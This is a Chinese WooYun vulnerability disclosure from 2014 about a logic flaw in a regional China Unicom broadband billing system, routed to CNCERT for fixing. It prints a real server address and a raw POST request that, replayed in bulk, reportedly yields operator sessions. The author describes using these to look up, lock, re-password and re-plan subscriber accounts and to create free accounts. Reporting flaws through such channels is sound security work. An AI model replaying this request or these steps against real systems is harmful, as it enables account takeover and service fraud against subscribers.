当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086804

漏洞标题:吉林省联通AIOBS计费套件漏洞(可开户、注销、锁定、改套餐、改密码等)

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2014-12-11 16:53

修复时间:2015-01-25 16:54

公开时间:2015-01-25 16:54

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-11: 细节已通知厂商并且等待厂商处理中
2014-12-16: 厂商已经确认,细节仅向厂商公开
2014-12-26: 细节向核心白帽子及相关领域专家公开
2015-01-05: 细节向普通白帽子公开
2015-01-15: 细节向实习白帽子公开
2015-01-25: 细节向公众公开

简要描述:

详细说明:

无意间发现一个类似openssl心脏出血般的漏洞,白菜一颗,无法详细分析漏洞成因!吉林省联通AIOBS在线服务综合管理计费套件可以用来自助更改用户密码查询清单等功能,而管理员登陆后可以进行很多操作。可以利用该漏洞对吉林省联通宽带用户进行开户、注销、锁定、改套餐、改密码啦!
吉林省联通AIOBS在线服务综合管理计费套件可以用来自助更改用户密码查询清单等功能,而管理员登陆后可以进行很多操作,如

1.PNG


不断向服务器post数据,就回返回不同操作员操作的结果给我。
http://218.27.126.42:8000/cgi/opr_login.ktcl

漏洞证明:

由于夜间可能很少有人登陆系统,所以审核人员如果无法复现还请早上试试。
POST如下数据即可返回不同结果

POST /cgi/opr_auth.ktcl HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_15
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 77
oprlogin=aiob0s6super&respcode=&challenge=&clientip=9.9.20.251&authflag=1


我利用intruder进行反复重复1万次发送post请求,利用正则匹配到多个地区的多个账户信息

1.png


而某一次的返回,利用burpsuite的show response in browser

2.PNG


我们查询某个客户

3.PNG


给他可以锁定 改密 等等
现在试试改套餐了

4.PNG


还有 如果你想一个账户多次登录ADSL ,简单只要修改一个参数即可

5.PNG


功能还有很多,自己开一个WLAN免费账户什么的啦。
不一一演示了!
收!

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-12-16 12:05

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给吉林分中心,由吉林分中心后续协调网站管理单位处置。

最新状态:

暂无